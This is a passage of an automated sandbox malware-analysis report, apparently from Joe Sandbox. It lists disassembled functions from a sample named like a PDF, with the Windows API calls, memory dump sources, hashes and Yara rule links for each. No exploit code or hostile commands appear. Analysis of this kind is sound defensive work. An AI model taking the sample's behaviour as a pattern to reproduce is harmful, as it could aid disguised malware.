                                                                          • GetDlgCtrlID.USER32(?), ref: 00B39612
                                                                          • GetParent.USER32(?), ref: 00B3962E
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B39631
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 18b40ec5963f1e88d6764203a218fb45d1a7256c937c6d6cbe77f32a379d55cb
                                                                          • Instruction ID: 3e7958647671e159eab07448b0cdbd3fa72852cbf46f2c9b09109e6c5878813d
                                                                          • Opcode Fuzzy Hash: 18b40ec5963f1e88d6764203a218fb45d1a7256c937c6d6cbe77f32a379d55cb
                                                                          • Instruction Fuzzy Hash: 9221C574900205BBDF05AB65DCC5EFEBBB8EF58300F204069F921971E1DBB99919DB20
                                                                          Function 00B39645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00B39651
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B39666
                                                                          • _wcscmp.LIBCMT ref: 00B39678
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B396F3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 1704125052-3381328864
                                                                          • Opcode ID: 4925aeefe1823fe66f6b17ae0ad526b89a4c67b52bad631866ba73e425131499
                                                                          • Instruction ID: 2bbb02cfa7628cca767e52876f882f70a322339fc196858785b462964be08966
                                                                          • Opcode Fuzzy Hash: 4925aeefe1823fe66f6b17ae0ad526b89a4c67b52bad631866ba73e425131499
                                                                          • Instruction Fuzzy Hash: AA112C77649307BAFB012625EC0BDA777DCDB14760F3000EAF910A50E1FEE159108558
                                                                          Function 00B58BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58BEC
                                                                          • CoInitialize.OLE32(00000000), ref: 00B58C19
                                                                          • CoUninitialize.OLE32 ref: 00B58C23
                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00B58D23
                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B58E50
                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B72C0C), ref: 00B58E84
                                                                          • CoGetObject.OLE32(?,00000000,00B72C0C,?), ref: 00B58EA7
                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00B58EBA
                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B58F3A
                                                                          • VariantClear.OLEAUT32(?), ref: 00B58F4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2395222682-0
                                                                          • Opcode ID: 866a19b2a6435ae53183869a632886328bbfbaf6d8845b1560c111e6de56f5e2
                                                                          • Instruction ID: 0648bf89e70674090180e444b386784dcb40a5fb50870be6f6cb0012b3e3e52f
                                                                          • Opcode Fuzzy Hash: 866a19b2a6435ae53183869a632886328bbfbaf6d8845b1560c111e6de56f5e2
                                                                          • Instruction Fuzzy Hash: 3EC11771204305AFD700DF64C884A2BB7E9FF89749F1049ADF98A9B261DB71ED09CB52
                                                                          Function 00B44189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00B4419D
                                                                          • __swprintf.LIBCMT ref: 00B441AA
                                                                            • Part of subcall function 00B038D8: __woutput_l.LIBCMT ref: 00B03931
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B441D4
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B441E0
                                                                          • LockResource.KERNEL32(00000000), ref: 00B441ED
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00B4420D
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B4421F
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00B4422E
                                                                          • LockResource.KERNEL32(?), ref: 00B4423A
                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B4429B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                          • String ID:
                                                                          • API String ID: 1433390588-0
                                                                          • Opcode ID: bcca8881ebc26e56972e954b4cd87e0b81ad431f099af7cb4fdbfe46c4ef721c
                                                                          • Instruction ID: 259aa2c4e1eec2f068d4a428eb9f5bc6330df2dc568a448962fb38e59e642844
                                                                          • Opcode Fuzzy Hash: bcca8881ebc26e56972e954b4cd87e0b81ad431f099af7cb4fdbfe46c4ef721c
                                                                          • Instruction Fuzzy Hash: C031A072A0521AAFCB119F60EC59EBB7BECFF05301F004565F901E3190DBB4DA619BA0
                                                                          Function 00B416DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B41700
                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B41714
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B4171B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B4172A
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4173C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B41755
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B41767
                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417AC
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417C1
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417CC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 94460e97431490c94ee3f01f4a86054edc98a3c47778cc334811b951e6734a89
                                                                          • Instruction ID: f199669c8bd72421dc2e2a0293fcf19dc2550511e92858e67a3a2fa68e30765a
                                                                          • Opcode Fuzzy Hash: 94460e97431490c94ee3f01f4a86054edc98a3c47778cc334811b951e6734a89
                                                                          • Instruction Fuzzy Hash: 5331BFB5A48204BFEB119F58ED85B793BE9EB16711F1044A4F800C72A0EFB59F81DB61
                                                                          Function 00AEFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AEFC06
                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00AEFCA5
                                                                          • UnregisterHotKey.USER32(?), ref: 00AEFDFC
                                                                          • DestroyWindow.USER32(?), ref: 00B24A00
                                                                          • FreeLibrary.KERNEL32(?), ref: 00B24A65
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B24A92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 469580280-3243417748
                                                                          • Opcode ID: 089af7e0f1c02d5765923c949cb4b1e88973a63b3a33e347d2274cb7a2287f2c
                                                                          • Instruction ID: a716b0f17b651941eab2591e19217cb17ab0ce0c90700dba2ba3bb470d1db536
                                                                          • Opcode Fuzzy Hash: 089af7e0f1c02d5765923c949cb4b1e88973a63b3a33e347d2274cb7a2287f2c
                                                                          • Instruction Fuzzy Hash: 4FA18C30701222CFCB28EF15D998B69F7A4EF05700F2442EDE90AAB261DB30AD16CF54
                                                                          Function 00B3A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnumChildWindows.USER32(?,00B3AA64), ref: 00B3A9A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ChildEnumWindows
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 3555792229-1603158881
                                                                          • Opcode ID: 6cd5b87ad62fab03afad84444a66cc1d415f4a6d5e22128a1b95c250414d53ad
                                                                          • Instruction ID: 3bef1985756c6d1d735e95333349140b2587371b683c36f483e28b77ba9ba63a
                                                                          • Opcode Fuzzy Hash: 6cd5b87ad62fab03afad84444a66cc1d415f4a6d5e22128a1b95c250414d53ad
                                                                          • Instruction Fuzzy Hash: F4917331900646EADB18DF64C481BE9FBF4FF14344F3482A9D8DAA7191DF306959CBA1
                                                                          Function 00AE2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00AE2EAE
                                                                            • Part of subcall function 00AE1DB3: GetClientRect.USER32(?,?), ref: 00AE1DDC
                                                                            • Part of subcall function 00AE1DB3: GetWindowRect.USER32(?,?), ref: 00AE1E1D
                                                                            • Part of subcall function 00AE1DB3: ScreenToClient.USER32(?,?), ref: 00AE1E45
                                                                          • GetDC.USER32 ref: 00B1CF82
                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B1CF95
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B1CFA3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B1CFB8
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00B1CFC0
                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B1D04B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                          • String ID: U
                                                                          • API String ID: 4009187628-3372436214
                                                                          • Opcode ID: 0948b0dc8cf51a52a09d1a66258e012b95f3e10264db5a487af17d13b2081ecd
                                                                          • Instruction ID: 6d2b970dc981136ca20d03ad7efee0012a5e780f49a85e48414e1c8bec3b91fe
                                                                          • Opcode Fuzzy Hash: 0948b0dc8cf51a52a09d1a66258e012b95f3e10264db5a487af17d13b2081ecd
                                                                          • Instruction Fuzzy Hash: 0571C071500245DFCF218F64C895AFA7FFAFF49350F1442AAED555A1A6CB318C82DB60
                                                                          Function 00B6C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                            • Part of subcall function 00AE2344: GetCursorPos.USER32(?), ref: 00AE2357
                                                                            • Part of subcall function 00AE2344: ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B6C2E4
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00B6C2EA
                                                                          • ReleaseCapture.USER32 ref: 00B6C2F0
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00B6C39A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B6C3AD
                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B6C48F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 1924731296-2107944366
                                                                          • Opcode ID: 898699400704ff5fc6522cf2cd8e1555e98979c93b10a3c306a70e683094574f
                                                                          • Instruction ID: 41f77147bdf2f01b854ecdb0c1b9f3318196cb37d39a20f229a115b65db511d4
                                                                          • Opcode Fuzzy Hash: 898699400704ff5fc6522cf2cd8e1555e98979c93b10a3c306a70e683094574f
                                                                          • Instruction Fuzzy Hash: 9D518B71208305AFD700EF24D896F7A7BE5EB88310F04856DF5A58B2E1DB78A944CB52
                                                                          Function 00B58F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B6F910), ref: 00B5903D
                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B6F910), ref: 00B59071
                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B591EB
                                                                          • SysFreeString.OLEAUT32(?), ref: 00B59215
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: a8e59affbb01ba6bdc6c4af5542eca43e06cbe73db39532a87509f0560da6e89
                                                                          • Instruction ID: e3c97143e660f1a70e4fb85e4303a0c62a8aa2e31fc24920ec39611bf8f22d06
                                                                          • Opcode Fuzzy Hash: a8e59affbb01ba6bdc6c4af5542eca43e06cbe73db39532a87509f0560da6e89
                                                                          • Instruction Fuzzy Hash: 28F11971A00219EFDB04DF94C888EAEB7B9FF49315F1084D9F916AB291DB31AD49CB50
                                                                          Function 00B5F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B5F9C9
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FB5C
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FB80
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FBC0
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FBE2
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B5FD5E
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B5FD90
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5FDBF
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5FE36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: 36621bb5900a399cb6ea3a747359a7ef766627c1926e85105ba553f9056791ed
                                                                          • Instruction ID: aebb07514bbd586602966b170678c883de94bd245ce5a8760ca4d300d5cdf505
                                                                          • Opcode Fuzzy Hash: 36621bb5900a399cb6ea3a747359a7ef766627c1926e85105ba553f9056791ed
                                                                          • Instruction Fuzzy Hash: E8E190312043429FC714EF24C981B7ABBE1EF88354F1488ADF8999B2A2DB31DC45CB52
                                                                          Function 00B44F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B438D3,?), ref: 00B448C7
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B438D3,?), ref: 00B448E0
                                                                            • Part of subcall function 00B44CD3: GetFileAttributesW.KERNEL32(?,00B43947), ref: 00B44CD4
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B44FE2
                                                                          • _wcscmp.LIBCMT ref: 00B44FFC
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B45017
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: d3442d24a1e1b55e0dcac8609b0953462c9cf53429b187cd70621f82bf2b95ce
                                                                          • Instruction ID: c75e4d5d12c29b5b5a7ad4b02eed404f0bc63d408b16271c9f84d4aa5ab62d1c
                                                                          • Opcode Fuzzy Hash: d3442d24a1e1b55e0dcac8609b0953462c9cf53429b187cd70621f82bf2b95ce
                                                                          • Instruction Fuzzy Hash: 915153B24087859BC725DB60D885ADFB7ECEF84340F10496EF189D3192EF74A68C8766
                                                                          Function 00B688B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B6896E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 9a9b48f1628bb2b2061187a0c0525ce3b8270c072057ccf6e5b1ecc7666fb717
                                                                          • Instruction ID: 013dedc5cfca5334e33110a425e47f82caf88d16fb409c134f5a0da0e8465cfb
                                                                          • Opcode Fuzzy Hash: 9a9b48f1628bb2b2061187a0c0525ce3b8270c072057ccf6e5b1ecc7666fb717
                                                                          • Instruction Fuzzy Hash: B351B430500208BFDF209F64DC85BA93BE5FB05310F6042A2FA15E71E1DFB9A980CB91
                                                                          Function 00AE2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B1C547
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1C569
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B1C581
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B1C59F
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B1C5C0
                                                                          • DestroyIcon.USER32(00000000), ref: 00B1C5CF
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B1C5EC
                                                                          • DestroyIcon.USER32(?), ref: 00B1C5FB
